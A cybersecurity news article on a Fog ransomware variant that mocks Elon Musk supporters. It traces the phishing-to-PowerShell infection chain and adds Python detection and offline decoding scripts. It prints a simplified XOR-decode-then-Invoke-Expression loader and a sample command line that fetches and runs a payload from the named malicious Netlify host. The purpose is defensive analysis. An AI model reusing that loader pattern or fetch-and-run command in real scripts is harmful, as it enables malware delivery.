New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads

A sophisticated ransomware campaign specifically targeting and mocking supporters of Elon Musk has been identified by cybersecurity experts.
The attack, identified as a variant of Fog Ransomware, employs multi-stage PowerShell scripts and Netlify-hosted payloads to execute its malicious code.
This campaign represents a concerning evolution in politically-themed malware that combines financial motivation with satirical commentary.
The ransomware distinguishes itself through its unusual ransom note, which impersonates an individual named “Edward Coristine” allegedly associated with DOGE cryptocurrency.
In a bizarre twist, the note lists government email addresses as technical support contacts and contains satirical content directed at Musk supporters.
Upon execution, the malware launches a YouTube video mocking Elon Musk, serving both as a distraction technique and reinforcement of its parodical nature.
KrakenLabs researchers identified the campaign after tracing a series of infections back to phishing emails containing PDF attachments with misleading “Pay Adjustment” titles.
The attack employs a sophisticated chain involving .lnk file droppers and multiple stages of PowerShell execution, demonstrating a blend of technical prowess and psychological manipulation targeting specific groups.
The complete infection chain involves multiple components working in concert. The initial compromise begins with a phishing PDF that links to a Netlify-hosted ZIP archive, which then deploys a chain of PowerShell scripts beginning with “Pay.ps1” that orchestrates the attack.
The core payload includes “cwiper.exe” (the actual ransomware component), “ktool.exe” (which uses a bring-your-own-vulnerable-driver (BYOVD) technique with an Intel driver to gain kernel-level access), and specialized PowerShell scripts for reconnaissance.
Despite its satirical presentation, the presence of a Monero cryptocurrency wallet confirms the attack’s financial motivation beneath its trolling veneer.
This dual-purpose approach (financial gain masked by political mockery) represents an emerging trend in ransomware tactics that attempt to obscure criminal intent behind ideological facades.
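A detection-side view of the chain described above, written as an added example for this article rather than code from KrakenLabs or the reporting: it walks Sysmon-style process-creation events and flags a PowerShell process that fetches from the Netlify host named in the article, any execution of the component file names the article lists, and a flagged process whose parent chain is itself PowerShell (the second and later stages). The domain and file names come from the article; the telemetry, the archive name Pay.zip, the paths and the PowerShell switches are constructed assumptions for the sample only.

```python
"""Flag the download-and-run PowerShell chain the article describes from
process-creation telemetry (added example, not code from the article)."""
import re
from typing import Dict, List

# Names taken from the article. Only the domain and file names are from the
# reporting; every event below is constructed sample telemetry.
KNOWN_HOST = "hilarious-trifle-d9182e.netlify.app"
KNOWN_COMPONENTS = {"pay.ps1", "stage1.ps1", "trackerjacker.ps1",
                    "lootsubmit.ps1", "cwiper.exe", "ktool.exe"}

DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|DownloadString|DownloadFile)\b",
    re.IGNORECASE)
NETLIFY_URL = re.compile(r"https?://[\w.-]+\.netlify\.app/", re.IGNORECASE)

# Constructed Sysmon-style process-creation events. The archive name Pay.zip,
# the paths and the PowerShell switches are assumptions for the sample only.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Reports"'},
    {"pid": 300, "ppid": 100, "image": "powershell.exe",
     "cmdline": ('powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest '
                 'https://hilarious-trifle-d9182e.netlify.app/Pay.zip -OutFile $env:TEMP\\Pay.zip; '
                 'Expand-Archive $env:TEMP\\Pay.zip $env:TEMP\\Pay; & $env:TEMP\\Pay\\Pay.ps1"')},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": 'powershell.exe -File C:\\Users\\u\\AppData\\Local\\Temp\\Pay\\stage1.ps1'},
    {"pid": 500, "ppid": 400, "image": "cwiper.exe",
     "cmdline": 'C:\\Users\\u\\AppData\\Local\\Temp\\Pay\\cwiper.exe'},
]


def cmdline_tokens(cmdline: str) -> List[str]:
    """Split a command line into lower-cased tokens so file names compare whole."""
    return [t for t in re.split(r'[\s"\'\\/;&]+', cmdline.lower()) if t]


def component_hits(cmdline: str) -> List[str]:
    """Per-process indicators: known file name, known host, remote fetch via PowerShell."""
    hits = []
    if KNOWN_COMPONENTS & set(cmdline_tokens(cmdline)):
        hits.append("known_component")
    if KNOWN_HOST in cmdline.lower():
        hits.append("known_host")
    if NETLIFY_URL.search(cmdline) and DOWNLOAD_CMDLETS.search(cmdline):
        hits.append("remote_payload_fetch")
    return hits


def powershell_ancestors(pid: int, by_pid: Dict[int, dict]) -> int:
    """Count the unbroken run of powershell.exe parents above a process."""
    depth = 0
    ev = by_pid.get(pid)
    while ev is not None:
        parent = by_pid.get(ev["ppid"])
        if parent is None or parent["image"].lower() != "powershell.exe":
            break
        depth += 1
        ev = parent
    return depth


def analyze(events: List[dict]) -> Dict[int, List[str]]:
    """Return {pid: [indicator, ...]} for every process that triggered something."""
    by_pid = {e["pid"]: e for e in events}
    alerts: Dict[int, List[str]] = {}
    for e in events:
        hits = component_hits(e["cmdline"])
        # A flagged process launched from inside PowerShell is a second or later stage
        if hits and powershell_ancestors(e["pid"], by_pid) >= 1:
            hits.append("multi_stage_chain")
        if hits:
            alerts[e["pid"]] = hits
    return alerts


if __name__ == "__main__":
    for pid, hits in analyze(EVENTS).items():
        print(pid, ", ".join(hits))
```

The ordinary administrative PowerShell process (pid 200) produces no alert, while the loader, stage1.ps1 and cwiper.exe each do; the `multi_stage_chain` tag on the latter two is what separates this pattern from a single ad hoc download, and is the signal worth routing to an analyst even before file names are known.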
Infection Mechanism Details
The infection begins when victims open a phishing PDF purportedly containing pay adjustment information.
This document links to a Netlify-hosted domain (hilarious-trifle-d9182e.netlify.app) where malicious payloads are stored.
The initial PowerShell script (“Pay.ps1”) acts as the first-stage loader, which downloads and executes “stage1.ps1”, the primary orchestration component.
This script is responsible for deploying the remaining modules and establishing persistence.
# Simplified representation of the obfuscation method used in trackerjacker.ps1
# Each character of the payload is XORed with the corresponding character of a repeating key
$encoded = "XOR-obfuscated payload data"
$key = "KrakenObserved2025"
$decoded = for ($i = 0; $i -lt $encoded.Length; $i++) {
    $encoded[$i] -bxor $key[$i % $key.Length]
}
# The decoded text is executed directly, so the clear-text script never touches disk
Invoke-Expression([System.Text.Encoding]::ASCII.GetString($decoded))
The most technically sophisticated component is “trackerjacker.ps1,” which employs XOR-based obfuscation to evade detection.
After deobfuscation, this script performs system reconnaissance while “lootsubmit.ps1” leverages the Wigle API for geolocation data gathering.
Together with “cwiper.exe,” which performs the actual encryption, and “ktool.exe,” which provides kernel-level access through legitimate Intel drivers, this attack demonstrates a concerning level of technical sophistication behind its satirical facade.
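Two things an analyst wants from the XOR-obfuscated loader described above are a static rule that catches the pattern (a byte-wise `-bxor` loop whose output goes to `Invoke-Expression`) and a way to recover the payload offline without running it. The following is an added example, not code from the article or from the malware: the sample script it inspects is constructed to mirror the simplified snippet above and uses the key string quoted there, the payload is a harmless string of our own, and the Base64 wrapping of the XORed bytes is an assumption for illustration, since the article does not state how the real sample stores them.

```python
"""Offline triage of a PowerShell loader that XOR-decodes a payload and hands
it to Invoke-Expression (added example, not code from the article or sample)."""
import base64
import re
from typing import List, Optional


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed sample script. It mirrors the simplified trackerjacker.ps1 snippet
# from the article: a byte-wise -bxor loop against the key string quoted there,
# followed by Invoke-Expression on the decoded text. The payload is our own
# harmless string, and the Base64 wrapping of the XORed bytes is an assumption
# for illustration; the article does not state how the real sample stores them.
SAMPLE_KEY = "KrakenObserved2025"
SAMPLE_PAYLOAD = b'Write-Host "constructed sample payload"'
SAMPLE_ENCODED = base64.b64encode(
    xor_bytes(SAMPLE_PAYLOAD, SAMPLE_KEY.encode())).decode()

SUSPICIOUS_SCRIPT = f'''
$encoded = "{SAMPLE_ENCODED}"
$key = "{SAMPLE_KEY}"
$bytes = [Convert]::FromBase64String($encoded)
$decoded = for($i=0; $i -lt $bytes.Length; $i++) {{ $bytes[$i] -bxor $key[$i % $key.Length] }}
Invoke-Expression([System.Text.Encoding]::ASCII.GetString($decoded))
'''

BENIGN_SCRIPT = '''
# Constructed benign script: an ordinary administrative task
$services = Get-Service | Where-Object { $_.Status -eq "Running" }
$services | Export-Csv -Path running.csv
'''

# Static indicators. Any one alone is common in legitimate scripts; the
# combination of a XOR loop with dynamic execution of its output is what the
# article describes and what we alert on.
INDICATORS = {
    "xor_loop": re.compile(r"-bxor\b", re.IGNORECASE),
    "dynamic_exec": re.compile(r"\b(Invoke-Expression|iex)\b", re.IGNORECASE),
    "bytes_to_string": re.compile(r"\[System\.Text\.Encoding\]::\w+\.GetString", re.IGNORECASE),
}


def indicator_hits(script: str) -> List[str]:
    """Names of the indicators present in the script text."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def is_xor_loader(script: str) -> bool:
    """Flag scripts that XOR-decode data and then execute the result."""
    hits = indicator_hits(script)
    return "xor_loop" in hits and "dynamic_exec" in hits


def recover_payload(script: str) -> Optional[str]:
    """Decode the embedded payload without executing it.

    Looks for the literal $key / $encoded assignments used in the simplified
    snippet; real samples may rename or split these, in which case this returns
    None and the analyst falls back to manual extraction.
    """
    key_m = re.search(r'\$key\s*=\s*"([^"]+)"', script)
    enc_m = re.search(r'\$encoded\s*=\s*"([A-Za-z0-9+/=]+)"', script)
    if not key_m or not enc_m:
        return None
    raw = base64.b64decode(enc_m.group(1))
    return xor_bytes(raw, key_m.group(1).encode()).decode("ascii", errors="replace")


if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        verdict = "xor-loader" if is_xor_loader(script) else "clean"
        print(label, indicator_hits(script), verdict)
    print("recovered:", recover_payload(SUSPICIOUS_SCRIPT))
```

The same indicators apply to PowerShell script block logging (event 4104), where the deobfuscated second stage is recorded in clear text at execution time; the offline decoder is for the case where only the on-disk loader is available.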
The post New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads appeared first on Cyber Security News.